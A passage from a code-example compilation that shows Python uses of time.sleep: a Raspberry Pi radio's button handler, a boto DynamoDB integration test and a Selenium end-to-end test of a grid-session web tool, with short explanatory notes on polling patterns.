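    for _ in range(iterations):
        if is_mongo_up():
            time.sleep(2)                  # normal two-second poll
        else:
            run_loop_sleep = min(run_loop_sleep + 2, MAX_SLEEP_TIME)
            time.sleep(run_loop_sleep)     # grows two seconds per failure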

Example 22

Project: piradio
Source File: radio4.py
View license
def get_switch_states(lcd,radio,rss):
	interrupt = False       # Interrupt display
	switch = radio.getSwitch()
	display_mode = radio.getDisplayMode()
	input_source = radio.getSource()
	option = radio.getOption()

	if switch == MENU_SWITCH:
		log.message("MENU switch", log.DEBUG)
		if radio.muted():
			unmuteRadio(lcd,radio)
		
		display_mode = display_mode + 1

		# Skip RSS mode if not available
		if display_mode == radio.MODE_RSS:
			if rss.isAvailable() and not radio.optionChanged():
				lcd.line3("Getting RSS feed")
			else:
				display_mode = display_mode + 1

		if display_mode > radio.MODE_LAST:
			display_mode = radio.MODE_TIME

		radio.setDisplayMode(display_mode)
		log.message("New mode " + radio.getDisplayModeString()+
					"(" + str(display_mode) + ")", log.DEBUG)

		# Shutdown if menu button held for > 3 seconds
		MenuSwitch = GPIO.input(MENU_SWITCH)
		count = 15
		while MenuSwitch:
			time.sleep(0.2)
			MenuSwitch = GPIO.input(MENU_SWITCH)
			count = count - 1
			if count < 0:
				log.message("Shutdown", log.DEBUG)
				MenuSwitch = False
				radio.setDisplayMode(radio.MODE_SHUTDOWN)

		if radio.getUpdateLibrary():
			update_library(lcd,radio)	
			radio.setDisplayMode(radio.MODE_TIME)

		elif radio.getReload(): 
			source = radio.getSource()
			log.message("Reload " + str(source), log.INFO)
			lcd.line2("Reloading ")
			reload(lcd,radio)
			radio.setReload(False)
			radio.setDisplayMode(radio.MODE_TIME)

		elif radio.optionChanged(): 
			log.message("optionChanged", log.DEBUG)
			if radio.alarmActive() and not radio.getTimer() and option == radio.ALARMSET:
				radio.setDisplayMode(radio.MODE_SLEEP)
				radio.mute()
			else:
				radio.setDisplayMode(radio.MODE_TIME)

			radio.optionChangedFalse()

		elif radio.loadNew():
			log.message("Load new  search=" + str(radio.getSearchIndex()), log.DEBUG)
			radio.playNew(radio.getSearchIndex())
			radio.setDisplayMode(radio.MODE_TIME)

		interrupt = True

	elif switch == UP_SWITCH:
		log.message("UP switch display_mode " + str(display_mode), log.DEBUG)

		if  display_mode != radio.MODE_SLEEP:
			if radio.muted():
				unmuteRadio(lcd,radio)

			if display_mode == radio.MODE_SOURCE:
				radio.toggleSource()
				radio.setReload(True)

			elif display_mode == radio.MODE_SEARCH:
				wait = 0.5
				while GPIO.input(UP_SWITCH):
					scroll_search(radio,UP)
					display_search(lcd,radio)
					time.sleep(wait)
					wait = 0.1

			elif display_mode == radio.MODE_OPTIONS:
				cycle_options(radio,UP)

			else:
				radio.channelUp()

			interrupt = True
		else:
			DisplayExitMessage(lcd)

	elif switch == DOWN_SWITCH:
		log.message("DOWN switch display_mode " + str(display_mode), log.DEBUG)

		if  display_mode != radio.MODE_SLEEP:
			if radio.muted():
				unmuteRadio(lcd,radio)

			if display_mode == radio.MODE_SOURCE:
				radio.toggleSource()
				radio.setReload(True)

			elif display_mode == radio.MODE_SEARCH:
				wait = 0.5
				while GPIO.input(DOWN_SWITCH):
					scroll_search(radio,DOWN)
					display_search(lcd,radio)
					time.sleep(wait)
					wait = 0.1

			elif display_mode == radio.MODE_OPTIONS:
				cycle_options(radio,DOWN)

			else:
				radio.channelDown()
			interrupt = True
		else:
			DisplayExitMessage(lcd)

	elif switch == LEFT_SWITCH:
		log.message("LEFT switch" ,log.DEBUG)

		if  display_mode != radio.MODE_SLEEP:
			if display_mode == radio.MODE_OPTIONS:
				toggle_option(radio,lcd,DOWN)
				interrupt = True

			elif display_mode == radio.MODE_SEARCH and input_source == radio.PLAYER:
				wait = 0.5
				while GPIO.input(LEFT_SWITCH):
					scroll_artist(radio,DOWN)
					display_search(lcd,radio)
					time.sleep(wait)
					wait = 0.1
				interrupt = True

			elif display_mode == radio.MODE_OPTIONS:
				interrupt = True

			else:
				# Decrease volume
				volChange = True
				while volChange:
					# Mute function (Both buttons depressed)
					if GPIO.input(RIGHT_SWITCH):
						radio.mute()
						if radio.alarmActive():
							radio.setDisplayMode(radio.MODE_SLEEP)
							interrupt = True
						displayLine4(lcd,radio,"Sound muted")
						time.sleep(2)
						volChange = False
						interrupt = True
					else:
						volume = radio.decreaseVolume()
						displayLine4(lcd,radio,"Volume " + str(volume))
						volChange = GPIO.input(LEFT_SWITCH)
						if volume <= 0:
							volChange = False
						time.sleep(0.1)
		else:
			DisplayExitMessage(lcd)

	elif switch == RIGHT_SWITCH:
		log.message("RIGHT switch" ,log.DEBUG)

		if  display_mode != radio.MODE_SLEEP:
			if display_mode == radio.MODE_OPTIONS:
				toggle_option(radio,lcd,UP)
				interrupt = True

			elif display_mode == radio.MODE_SEARCH and input_source == radio.PLAYER:
				wait = 0.5
				while GPIO.input(RIGHT_SWITCH):
					scroll_artist(radio,UP)
					display_search(lcd,radio)
					time.sleep(wait)
					wait = 0.1
				interrupt = True

			elif display_mode == radio.MODE_OPTIONS:
				interrupt = True
			else:
				# Increase volume
				volChange = True
				while volChange:
					# Mute function (Both buttons depressed)
					if GPIO.input(LEFT_SWITCH):
						radio.mute()
						if radio.alarmActive():
							radio.setDisplayMode(radio.MODE_SLEEP)
							interrupt = True
						displayLine4(lcd,radio,"Sound muted")
						time.sleep(2)
						volChange = False
						interrupt = True
					else:
						volume = radio.increaseVolume()
						displayLine4(lcd,radio,"Volume " + str(volume))
						volChange =  GPIO.input(RIGHT_SWITCH)
						if volume >= 100:
							volChange = False
						time.sleep(0.1)
		else:
			DisplayExitMessage(lcd)

	return interrupt
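
The MENU branch above detects a long press by re-reading the switch every 0.2 seconds and counting down from 15, so roughly three seconds of continuous pressure triggers shutdown; the search branches use the same idea with a sleep that shrinks from 0.5 s to 0.1 s to accelerate scrolling while a button stays held. A minimal sketch of the long-press check, with a plain callable standing in for GPIO.input so it runs anywhere (read_switch and the count threshold are assumptions):

import time

def held_for_three_seconds(read_switch):
    count = 15
    while read_switch():
        time.sleep(0.2)        # poll the button five times a second
        count -= 1
        if count < 0:
            return True        # held for roughly three seconds
    return False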

Example 23

Project: boto
Source File: test_highlevel.py
View license
    def test_integration(self):
        # Test creating a full table with all options specified.
        users = Table.create('users', schema=[
            HashKey('username'),
            RangeKey('friend_count', data_type=NUMBER)
        ], throughput={
            'read': 5,
            'write': 5,
        }, indexes=[
            KeysOnlyIndex('LastNameIndex', parts=[
                HashKey('username'),
                RangeKey('last_name')
            ]),
        ])
        self.addCleanup(users.delete)

        self.assertEqual(len(users.schema), 2)
        self.assertEqual(users.throughput['read'], 5)

        # Wait for it.
        time.sleep(60)

        # Make sure things line up if we're introspecting the table.
        users_hit_api = Table('users')
        users_hit_api.describe()
        self.assertEqual(len(users.schema), len(users_hit_api.schema))
        self.assertEqual(users.throughput, users_hit_api.throughput)
        self.assertEqual(len(users.indexes), len(users_hit_api.indexes))

        # Test putting some items individually.
        users.put_item(data={
            'username': 'johndoe',
            'first_name': 'John',
            'last_name': 'Doe',
            'friend_count': 4
        })

        users.put_item(data={
            'username': 'alice',
            'first_name': 'Alice',
            'last_name': 'Expert',
            'friend_count': 2
        })

        time.sleep(5)

        # Test batch writing.
        with users.batch_write() as batch:
            batch.put_item({
                'username': 'jane',
                'first_name': 'Jane',
                'last_name': 'Doe',
                'friend_count': 3
            })
            batch.delete_item(username='alice', friend_count=2)
            batch.put_item({
                'username': 'bob',
                'first_name': 'Bob',
                'last_name': 'Smith',
                'friend_count': 1
            })

        time.sleep(5)

        # Does it exist? It should.
        self.assertTrue(users.has_item(username='jane', friend_count=3))
        # But this shouldn't be there...
        self.assertFalse(users.has_item(
            username='mrcarmichaeljones',
            friend_count=72948
        ))

        # Test getting an item & updating it.
        # This is the "safe" variant (only write if there have been no
        # changes).
        jane = users.get_item(username='jane', friend_count=3)
        self.assertEqual(jane['first_name'], 'Jane')
        jane['last_name'] = 'Doh'
        self.assertTrue(jane.save())

        # Test strongly consistent getting of an item.
        # Additionally, test the overwrite behavior.
        client_1_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(jane['first_name'], 'Jane')
        client_2_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(jane['first_name'], 'Jane')

        # Write & assert the ``first_name`` is gone, then...
        del client_1_jane['first_name']
        self.assertTrue(client_1_jane.save())
        check_name = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(check_name['first_name'], None)

        # ...overwrite the data with what's in memory.
        client_2_jane['first_name'] = 'Joan'
        # Now a write that fails due to default expectations...
        self.assertRaises(exceptions.JSONResponseError, client_2_jane.save)
        # ... so we force an overwrite.
        self.assertTrue(client_2_jane.save(overwrite=True))
        check_name_again = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(check_name_again['first_name'], 'Joan')

        # Reset it.
        jane['username'] = 'jane'
        jane['first_name'] = 'Jane'
        jane['last_name'] = 'Doe'
        jane['friend_count'] = 3
        self.assertTrue(jane.save(overwrite=True))

        # Test the partial update behavior.
        client_3_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        client_4_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        client_3_jane['favorite_band'] = 'Feed Me'
        # No ``overwrite`` needed due to new data.
        self.assertTrue(client_3_jane.save())
        # Expectations are only checked on the ``first_name``, so what wouldn't
        # have succeeded by default does succeed here.
        client_4_jane['first_name'] = 'Jacqueline'
        self.assertTrue(client_4_jane.partial_save())
        partial_jane = users.get_item(
            username='jane',
            friend_count=3,
            consistent=True
        )
        self.assertEqual(partial_jane['favorite_band'], 'Feed Me')
        self.assertEqual(partial_jane['first_name'], 'Jacqueline')

        # Reset it.
        jane['username'] = 'jane'
        jane['first_name'] = 'Jane'
        jane['last_name'] = 'Doe'
        jane['friend_count'] = 3
        self.assertTrue(jane.save(overwrite=True))

        # Ensure that partial saves of a brand-new object work.
        sadie = Item(users, data={
            'username': 'sadie',
            'first_name': 'Sadie',
            'favorite_band': 'Zedd',
            'friend_count': 7
        })
        self.assertTrue(sadie.partial_save())
        serverside_sadie = users.get_item(
            username='sadie',
            friend_count=7,
            consistent=True
        )
        self.assertEqual(serverside_sadie['first_name'], 'Sadie')

        # Test the eventually consistent query.
        results = users.query_2(
            username__eq='johndoe',
            last_name__eq='Doe',
            index='LastNameIndex',
            attributes=('username',),
            reverse=True
        )

        for res in results:
            self.assertTrue(res['username'] in ['johndoe',])
            self.assertEqual(list(res.keys()), ['username'])

        # Ensure that queries with attributes don't return the hash key.
        results = users.query_2(
            username__eq='johndoe',
            friend_count__eq=4,
            attributes=('first_name',)
        )

        for res in results:
            self.assertEqual(res['first_name'], 'John')
            self.assertEqual(list(res.keys()), ['first_name'])

        # Test the strongly consistent query.
        c_results = users.query_2(
            username__eq='johndoe',
            last_name__eq='Doe',
            index='LastNameIndex',
            reverse=True,
            consistent=True
        )

        for res in c_results:
            self.assertEqual(res['username'], 'johndoe')

        # Test a query with query filters
        results = users.query_2(
            username__eq='johndoe',
            query_filter={
                'first_name__beginswith': 'J'
            },
            attributes=('first_name',)
        )

        for res in results:
            self.assertTrue(res['first_name'] in ['John'])

        # Test scans without filters.
        all_users = users.scan(limit=7)
        self.assertEqual(next(all_users)['username'], 'bob')
        self.assertEqual(next(all_users)['username'], 'jane')
        self.assertEqual(next(all_users)['username'], 'johndoe')

        # Test scans with a filter.
        filtered_users = users.scan(limit=2, username__beginswith='j')
        self.assertEqual(next(filtered_users)['username'], 'jane')
        self.assertEqual(next(filtered_users)['username'], 'johndoe')

        # Test deleting a single item.
        johndoe = users.get_item(username='johndoe', friend_count=4)
        johndoe.delete()

        # Set batch get limit to ensure keys with no results are
        # handled correctly.
        users.max_batch_get = 2

        # Test the eventually consistent batch get.
        results = users.batch_get(keys=[
            {'username': 'noone', 'friend_count': 4},
            {'username': 'nothere', 'friend_count': 10},
            {'username': 'bob', 'friend_count': 1},
            {'username': 'jane', 'friend_count': 3}
        ])
        batch_users = []

        for res in results:
            batch_users.append(res)
            self.assertIn(res['first_name'], ['Bob', 'Jane'])

        self.assertEqual(len(batch_users), 2)

        # Test the strongly consistent batch get.
        c_results = users.batch_get(keys=[
            {'username': 'bob', 'friend_count': 1},
            {'username': 'jane', 'friend_count': 3}
        ], consistent=True)
        c_batch_users = []

        for res in c_results:
            c_batch_users.append(res)
            self.assertTrue(res['first_name'] in ['Bob', 'Jane'])

        self.assertEqual(len(c_batch_users), 2)

        # Test count, but only loosely, since counts can lag behind recent writes.
        self.assertTrue(users.count() > -1)

        # Test query count
        count = users.query_count(
            username__eq='bob',
        )

        self.assertEqual(count, 1)

        # Test without LSIs (describe calls shouldn't fail).
        admins = Table.create('admins', schema=[
            HashKey('username')
        ])
        self.addCleanup(admins.delete)
        time.sleep(60)
        admins.describe()
        self.assertEqual(admins.throughput['read'], 5)
        self.assertEqual(admins.indexes, [])

        # A single query term should fail on a table with *ONLY* a HashKey.
        self.assertRaises(
            exceptions.QueryError,
            admins.query,
            username__eq='johndoe'
        )
        # But it shouldn't break on more complex tables.
        res = users.query_2(username__eq='johndoe')

        # Test putting with/without sets.
        mau5_created = users.put_item(data={
            'username': 'mau5',
            'first_name': 'dead',
            'last_name': 'mau5',
            'friend_count': 2,
            'friends': set(['skrill', 'penny']),
        })
        self.assertTrue(mau5_created)

        penny_created = users.put_item(data={
            'username': 'penny',
            'first_name': 'Penny',
            'friend_count': 0,
            'friends': set([]),
        })
        self.assertTrue(penny_created)

        # Test attributes.
        mau5 = users.get_item(
            username='mau5',
            friend_count=2,
            attributes=['username', 'first_name']
        )
        self.assertEqual(mau5['username'], 'mau5')
        self.assertEqual(mau5['first_name'], 'dead')
        self.assertTrue('last_name' not in mau5)
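
The fixed time.sleep(60) above simply waits for the freshly created table to become usable before describe() is called. A less brittle pattern is to poll the table status and sleep in short intervals until it reports ACTIVE. The sketch below is illustrative only and is not part of the test above; it assumes a table object whose describe() call returns the usual {'Table': {'TableStatus': ...}} structure, as boto's DynamoDB v2 layer does.

import time

def wait_until_active(table, timeout=120, interval=5):
    # Poll the table status until it is ACTIVE or the timeout expires,
    # sleeping briefly between checks instead of one long fixed sleep.
    # Assumes table.describe() returns {'Table': {'TableStatus': ...}}.
    deadline = time.time() + timeout
    while time.time() < deadline:
        if table.describe()['Table']['TableStatus'] == 'ACTIVE':
            return True
        time.sleep(interval)
    return False

Used as wait_until_active(admins) in place of the fixed 60-second sleep, the test proceeds as soon as the table is ready.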

Example 24

Project: RGT-tool
Source File: testSession.py
View license
    def test_session_process(self):

        #Process to create a session with name session3
        #user logs in successfully and sees the sessions page
        self.can_goto_session_page("[email protected]", "123")

        # User clicks the create session link and sees the create session page
        create_session_link = self.browser.find_element_by_link_text("create")
        create_session_link.click()

        # user selects grid to create the session
        select_grid_field = self.browser.find_element_by_css_selector("select[id='gridSessionSelection']")
        self.assertIn('grid1', select_grid_field.text)

        # User selects the option with grid name 'grid1' and sees the grid with the
        # name 'grid1' in the input text.
        option_grid_fields = self.browser.find_elements_by_css_selector('option')
        option_grid_fields[1].click()

        # user enters the session name
        session_new_name = self.browser.find_element_by_id("sessionNameInputBox")
        session_new_name.send_keys('session3')

        # user checks the radio button to allow the participants to see the results
        show_results = self.browser.find_element_by_css_selector("input[value='Y']")
        show_results.click()

        # user creates session
        create_button = self.browser.find_element_by_css_selector("input[value='Create session']")
        create_button.click()

        # A dialog box appears with the message 'Session was created.' and user closes it
        self.wait_for_dialog_box_with_message("Session was created.")

        # user logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Facilitator admin logs in and selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Participants panel shows two users with names User1 and User2
        participants_in_panel = self.browser.find_elements_by_class_name("respondedRequest")
        self.assertEqual(participants_in_panel[0].text, "User1 Participant")
        self.assertEqual(participants_in_panel[1].text, "User2 Participant")

        # Facilitator admin clicks the start session button
        start_session_button = self.browser.find_element_by_css_selector("input[value='Start session']")
        start_session_button.click()

        # Wait until the menu of the buttons changes to the session handling menu
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='Request alternatives/concerns']"))

        # The iteration label show iteration 1
        iteration_label = self.browser.find_element_by_id("iteration")
        self.assertIn("1", iteration_label.text)

        # The iteration status shows 'Check values'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Check values", current_iteration_status.text)

        ### REQUEST ALTERNATIVES / CONCERNS STEP ###

        # Facilitator admin clicks the request alternatives and concerns button
        request_alternatives_concerns_button = self.browser.find_element_by_css_selector(
            "input[value='Request alternatives/concerns']")
        request_alternatives_concerns_button.click()

        # Wait until the session menu changes, to include the finish session button
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='Finish request']"))

        # The iteration status shows 'Alternatives / Concerns'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Alternatives / Concerns", current_iteration_status.text)

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        ### RESPOND ALTERNATIVES / CONCERN STEP ###

        # Participant user1 logs in, goes to participating session
        # page and selects the session session1 of admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        # The number of participants shows 0/2, which means that no participant has responded yet
        session_details_body = self.browser.find_element_by_id("sessionDetails")
        self.assertIn("0/2", session_details_body.text)

        # Participant user1 mouse over to alternative_2
        # (because there are two grids, there are also two alternative fields with the same name)
        alternatives_with_name_alternative_2 = self.browser.find_elements_by_name("alternative_2_name")
        ActionChains(self.browser).move_to_element(alternatives_with_name_alternative_2[1]).perform()

        # Participant user1 clicks the button to add a column
        add_column_button = self.browser.find_element_by_xpath(
            "//div[@class='colMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_column_button.click()

        # Participant user1 types value for alternative_3
        alternative_3_name = self.browser.find_element_by_name("alternative_3_name")
        alternative_3_name.send_keys('a3')

        # Participant user1 sends the response and logs out
        send_response_button = self.browser.find_element_by_css_selector("input[value='Send response']")
        send_response_button.click()

        self.wait_for_dialog_box_with_message("Response was sent.")

        self.browser.refresh()
        time.sleep(2)

        # The number of participants shows 1/2 which means that one out of 2 participants responded
        # and the response status says Response was sent
        session_details_body = self.browser.find_element_by_id("sessionDetails")
        self.assertIn("1/2", session_details_body.text)
        self.assertIn("Response was sent at:", session_details_body.text)

        # Participant user1 logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Participant user2 logs in, goes to participating session
        # page and selects the session session1 of user admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        # The number of participants shows 1/2 which means that one out of 2 participants responded
        session_details_body = self.browser.find_element_by_id("sessionDetails")
        self.assertIn("1/2", session_details_body.text)

        # Participant user2 mouse over concern_3_left
        # (because there are two grids, there are also two concerns with the same name)
        concerns_with_name_concern_3_left = self.browser.find_elements_by_name("concern_3_left")
        ActionChains(self.browser).move_to_element(concerns_with_name_concern_3_left[1]).perform()

        # Participant user2 clicks the button to add a row
        add_row_button = self.browser.find_element_by_xpath(
            "//div[@class='gridRowMenu leftRowMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_row_button.click()

        # Participant user2 types left and right value for concern_4
        concern_4_left = self.browser.find_element_by_name("concern_4_left")
        concern_4_left.send_keys('l04')
        concern_4_right = self.browser.find_element_by_name("concern_4_right")
        concern_4_right.send_keys('r04')

        # Participant user2 mouse over concern_4_left
        concern_4_left = self.browser.find_element_by_name("concern_4_left")
        ActionChains(self.browser).move_to_element(concern_4_left).perform()

        # Participant user2 clicks the button to add a row
        add_row_button = self.browser.find_element_by_xpath(
            "//div[@class='gridRowMenu leftRowMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_row_button.click()

        # Participant user2 types left and right value for concern_5
        concern_5_left = self.browser.find_element_by_name("concern_5_left")
        concern_5_left.send_keys('l05')
        concern_5_right = self.browser.find_element_by_name("concern_5_right")
        concern_5_right.send_keys('r05')

        # Participant user2 sends the response
        send_response_button = self.browser.find_element_by_css_selector("input[value='Send response']")
        send_response_button.click()

        self.wait_for_dialog_box_with_message("Response was sent.")

        # Refresh the page after response was sent
        self.browser.refresh()

        time.sleep(1)

        # The number of participants shows 2/2 which means that all participants responded
        # and the response status says Response was sent
        session_details_body = self.browser.find_element_by_id("sessionDetails")
        self.assertIn("2/2", session_details_body.text)
        self.assertIn("Response was sent at:", session_details_body.text)

        # Participant user2 logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        ### REQUEST RATINGS STEP ###

        # Facilitator admin logs in, selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Facilitator admin clicks the finish request button
        finish_request_button = self.browser.find_element_by_css_selector("input[value='Finish request']")
        finish_request_button.click()

        # Wait until the session menu changes, to include the request ratings button
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='Request ratings']"))

        # The iteration label shows iteration 2
        iteration_label = self.browser.find_element_by_id("iteration")
        self.assertIn("2", iteration_label.text)

        # The iteration status shows 'Check values'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Check values", current_iteration_status.text)

        # Facilitator admin selects from the select field the results from iteration 1
        show_respond_from_iterations_options = self.browser.find_elements_by_xpath(
            "//select[@id='mySessionsContentSessionIterationSelect']/option")
        show_respond_from_iterations_options[1].click()

        # Wait until the results from the selected iteration appear
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_id("resultAlternativeConcernTablesDiv"))

        # Facilitator admin clicks the button to download results
        download_result1_button = self.browser.find_element_by_id("downloadResultsButton")
        download_result1_button.click()

        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("select[name='convertTo']"))

        # User types value for filename
        grid_file_name = self.browser.find_element_by_name("fileName")
        grid_file_name.send_keys('resultsIteration1')

        close_button = self.browser.find_element_by_css_selector("a[class='ui-dialog-titlebar-close ui-corner-all']")
        close_button.click()

        # Facilitator admin mouse over to alternative_2
        alternative_2_name = self.browser.find_element_by_name("alternative_2_name")
        ActionChains(self.browser).move_to_element(alternative_2_name).perform()

        # Facilitator admin clicks the button to add a column
        add_column_button = self.browser.find_element_by_xpath(
            "//div[@class='colMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_column_button.click()

        # Facilitator admin types value for alternative_3
        alternative_3_name = self.browser.find_element_by_name("alternative_3_name")
        alternative_3_name.send_keys('a3')

        # Facilitator admin mouse over to concern_3_left
        concern_3_left = self.browser.find_element_by_name("concern_3_left")
        ActionChains(self.browser).move_to_element(concern_3_left).perform()

        # Facilitator admin clicks the button to add a row
        add_row_button = self.browser.find_element_by_xpath(
            "//div[@class='gridRowMenu leftRowMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_row_button.click()

        # Facilitator admin types left and right value for concern_4
        concern_4_left = self.browser.find_element_by_name("concern_4_left")
        concern_4_left.send_keys('l04')
        concern_4_right = self.browser.find_element_by_name("concern_4_right")
        concern_4_right.send_keys('r04')

        # Facilitator admin mouse over concern_4_left
        concern_4_left = self.browser.find_element_by_name("concern_4_left")
        ActionChains(self.browser).move_to_element(concern_4_left).perform()

        # Facilitator admin clicks the button to add a row
        add_row_button = self.browser.find_element_by_xpath(
            "//div[@class='gridRowMenu leftRowMenuDiv' and contains(@style, 'block')]/a[2]/img[@class='addImage']")
        add_row_button.click()

        # Facilitator admin types left and right value for concern5
        concern_5_left = self.browser.find_element_by_name("concern_5_left")
        concern_5_left.send_keys('l05')
        concern_5_right = self.browser.find_element_by_name("concern_5_right")
        concern_5_right.send_keys('r05')

        self.fill_empty_ratings(False)

        # Facilitator admin saves the new grid
        save_changes_button = self.browser.find_element_by_css_selector("input[value='Save changes']")
        save_changes_button.click()

        # A dialog box appears with the message 'Grid was saved'
        self.wait_for_dialog_box_with_message("Grid was saved")

        # Facilitator admin clicks the clear results button to clear the results
        clear_results_button = self.browser.find_element_by_css_selector("input[value='Clear results']")
        clear_results_button.click()

        # Wait until the results are cleared
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_id("mySessionsContentResultDiv").text == "")

        # Facilitator admin clicks the request ratings button
        request_ratings_button = self.browser.find_element_by_css_selector("input[value='Request ratings']")
        request_ratings_button.click()

        # Wait until the session menu changes, to include the finish session button
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='Finish request']"))

        # The iteration status shows 'Ratings / Weights'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Ratings / Weights", current_iteration_status.text)

        # Facilitator clicks the show dendrogram button and gets the dendrogram
        show_dendrogram_button = self.browser.find_element_by_css_selector("input[value='Show dendrogram']")
        show_dendrogram_button.click()

        time.sleep(2)

        # Wait until the dendrogram appears successfully
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_class_name("dendrogramTitle"))

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        ### RESPOND RATINGS STEP ###

        # Participant with the name user1 logs in, goes to participating session
        # page and selects the session session1 of user admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        # Participant user1 types some values for the ratings
        #self.fill_empty_ratings(True)

        # Participant user1 sends the response
        send_response_button = self.browser.find_element_by_css_selector("input[value='Send response']")
        send_response_button.click()

        self.wait_for_dialog_box_with_message("Response was sent.")

        # Participant user1 logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Participant with the name user2 logs in, goes to participating session
        # page and selects the session session1 of user admin
        self.participant_can_select_session("[email protected]", "123", "Admin Istrator: session1", False)

        # Participant user2 types some values for the ratings
        #self.fill_empty_ratings(True)

        # Participant user2 sends the response
        send_response_button = self.browser.find_element_by_css_selector("input[value='Send response']")
        send_response_button.click()

        self.wait_for_dialog_box_with_message("Response was sent.")

        # Participant user2 logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        ### END SESSION STEP ###

        # Facilitator admin logs in, selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Facilitator admin clicks the finish request button
        finish_request_button = self.browser.find_element_by_css_selector("input[value='Finish request']")
        finish_request_button.click()

        # Wait until the session menu changes, to include the end session button
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("input[value='End session']"))

        # The iteration label shows iteration 3
        iteration_label = self.browser.find_element_by_id("iteration")
        self.assertIn("3", iteration_label.text)

        # The iteration status shows 'Check values'
        current_iteration_status = self.browser.find_element_by_id("currentIterationStatus")
        self.assertIn("Check values", current_iteration_status.text)

        # Facilitator admin selects from the select field the results from iteration 2
        show_respond_from_iterations_options = self.browser.find_elements_by_xpath(
            "//select[@id='mySessionsContentSessionIterationSelect']/option")
        show_respond_from_iterations_options[2].click()

        # Wait until the results from the selected iteration appear
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_id("clearResultsButton"))

        time.sleep(2)

        download_result2_button = self.browser.find_element_by_css_selector("input[id='downloadResultsButton']")
        download_result2_button.click()

        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("select[name='convertTo']"))

        # User types value for filename
        grid_file_name = self.browser.find_element_by_name("fileName")
        grid_file_name.send_keys('resultsIteration2')

        close_button = self.browser.find_element_by_css_selector("a[class='ui-dialog-titlebar-close ui-corner-all']")
        close_button.click()

        field = self.browser.find_element_by_id('ratio_concer1_alternative1')
        field.send_keys('1')

        # Facilitator admin saves the changes
        save_changes_button = self.browser.find_element_by_css_selector("input[value='Save changes']")
        save_changes_button.click()

        # A dialog box appears with the message 'Grid was saved'
        self.wait_for_dialog_box_with_message("Grid was saved")

        # Facilitator clicks the show dendrogram button and gets the dendrogram
        show_dendrogram_button = self.browser.find_element_by_css_selector("input[value='Show dendrogram']")
        show_dendrogram_button.click()

        # Wait until the dendrogram appears successfully
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_tag_name("svg"))

        time.sleep(1)

        # Facilitator admin clicks the end session button
        end_session_button = self.browser.find_element_by_css_selector("input[value='End session']")
        end_session_button.click()

        # And confirms ending the session
        confirm_button = self.browser.find_element_by_css_selector(".ui-dialog-buttonset button")
        confirm_button.click()

        # Wait until the status change to Closed
        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_id("currentIterationStatus").text == "Closed")

        # Facilitator admin logs out
        logout_link = self.browser.find_element_by_link_text("Log out")
        logout_link.click()

        # Facilitator admin logs in, selects the session with name session1
        self.facilitator_can_select_session("[email protected]", "123", "session1")

        # Facilitator clicks the show dendrogram button and gets the dendrogram
        show_dendrogram_button = self.browser.find_element_by_css_selector("input[value='Show dendrogram']")
        show_dendrogram_button.click()

        # Wait until the dendrogram appears successfully
        WebDriverWait(self.browser, 10).until(lambda x: self.browser.find_element_by_tag_name("svg"))

        time.sleep(1)

        # Facilitator mouse over dendrogram
        dendrogram_image = self.browser.find_element_by_tag_name("svg")
        ActionChains(self.browser).move_to_element(dendrogram_image).perform()

        save_image_button = self.browser.find_element_by_css_selector("img[id='saveButtonImg']")
        save_image_button.click()

        WebDriverWait(self.browser, 10).until(
            lambda x: self.browser.find_element_by_css_selector("select[name='convertTo']"))

        # Facilitator types value for filename
        session_file_name = self.browser.find_element_by_name("fileName")
        session_file_name.send_keys('dendrogram')

        #for future use
